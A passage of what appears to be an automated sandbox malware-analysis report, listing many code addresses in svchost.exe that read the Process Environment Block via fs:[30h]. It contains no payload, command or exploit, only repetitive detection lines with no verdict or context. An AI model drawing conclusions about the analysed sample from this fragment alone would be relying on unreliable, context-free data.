          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEB50 mov eax, dword ptr fs:[00000030h]1_2_033DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4B4B mov eax, dword ptr fs:[00000030h]1_2_033E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6B40 mov eax, dword ptr fs:[00000030h]1_2_033C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FAB40 mov eax, dword ptr fs:[00000030h]1_2_033FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D8B42 mov eax, dword ptr fs:[00000030h]1_2_033D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340BBE mov eax, dword ptr fs:[00000030h]1_2_03340BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033E4BB0 mov eax, dword ptr fs:[00000030h]1_2_033E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338BF0 mov eax, dword ptr fs:[00000030h]1_2_03338BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EBFC mov eax, dword ptr fs:[00000030h]1_2_0335EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCBF0 mov eax, dword ptr fs:[00000030h]1_2_033BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEBD0 mov eax, dword ptr fs:[00000030h]1_2_033DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03350BCB mov eax, dword ptr fs:[00000030h]1_2_03350BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330BCD mov eax, dword ptr fs:[00000030h]1_2_03330BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03354A35 mov eax, dword ptr fs:[00000030h]1_2_03354A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA24 mov eax, dword ptr fs:[00000030h]1_2_0336CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EA2E mov eax, dword ptr fs:[00000030h]1_2_0335EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BCA11 mov eax, dword ptr fs:[00000030h]1_2_033BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033ACA72 mov eax, dword ptr fs:[00000030h]1_2_033ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336CA6F mov eax, dword ptr fs:[00000030h]1_2_0336CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033DEA60 mov eax, dword ptr fs:[00000030h]1_2_033DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03336A50 mov eax, dword ptr fs:[00000030h]1_2_03336A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340A5B mov eax, dword ptr fs:[00000030h]1_2_03340A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338AA0 mov eax, dword ptr fs:[00000030h]1_2_03338AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386AA4 mov eax, dword ptr fs:[00000030h]1_2_03386AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368A90 mov edx, dword ptr fs:[00000030h]1_2_03368A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333EA80 mov eax, dword ptr fs:[00000030h]1_2_0333EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404A80 mov eax, dword ptr fs:[00000030h]1_2_03404A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336AAEE mov eax, dword ptr fs:[00000030h]1_2_0336AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03330AD0 mov eax, dword ptr fs:[00000030h]1_2_03330AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364AD0 mov eax, dword ptr fs:[00000030h]1_2_03364AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03386ACC mov eax, dword ptr fs:[00000030h]1_2_03386ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B892A mov eax, dword ptr fs:[00000030h]1_2_033B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C892B mov eax, dword ptr fs:[00000030h]1_2_033C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC912 mov eax, dword ptr fs:[00000030h]1_2_033BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03328918 mov eax, dword ptr fs:[00000030h]1_2_03328918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE908 mov eax, dword ptr fs:[00000030h]1_2_033AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D4978 mov eax, dword ptr fs:[00000030h]1_2_033D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC97C mov eax, dword ptr fs:[00000030h]1_2_033BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03356962 mov eax, dword ptr fs:[00000030h]1_2_03356962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov edx, dword ptr fs:[00000030h]1_2_0337096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E mov eax, dword ptr fs:[00000030h]1_2_0337096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B0946 mov eax, dword ptr fs:[00000030h]1_2_033B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov esi, dword ptr fs:[00000030h]1_2_033B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B89B3 mov eax, dword ptr fs:[00000030h]1_2_033B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033429A0 mov eax, dword ptr fs:[00000030h]1_2_033429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033309AD mov eax, dword ptr fs:[00000030h]1_2_033309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033629F9 mov eax, dword ptr fs:[00000030h]1_2_033629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE9E0 mov eax, dword ptr fs:[00000030h]1_2_033BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0333A9D0 mov eax, dword ptr fs:[00000030h]1_2_0333A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033649D0 mov eax, dword ptr fs:[00000030h]1_2_033649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033FA9D3 mov eax, dword ptr fs:[00000030h]1_2_033FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C69C0 mov eax, dword ptr fs:[00000030h]1_2_033C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov ecx, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03352835 mov eax, dword ptr fs:[00000030h]1_2_03352835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A830 mov eax, dword ptr fs:[00000030h]1_2_0336A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033D483A mov eax, dword ptr fs:[00000030h]1_2_033D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC810 mov eax, dword ptr fs:[00000030h]1_2_033BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BE872 mov eax, dword ptr fs:[00000030h]1_2_033BE872
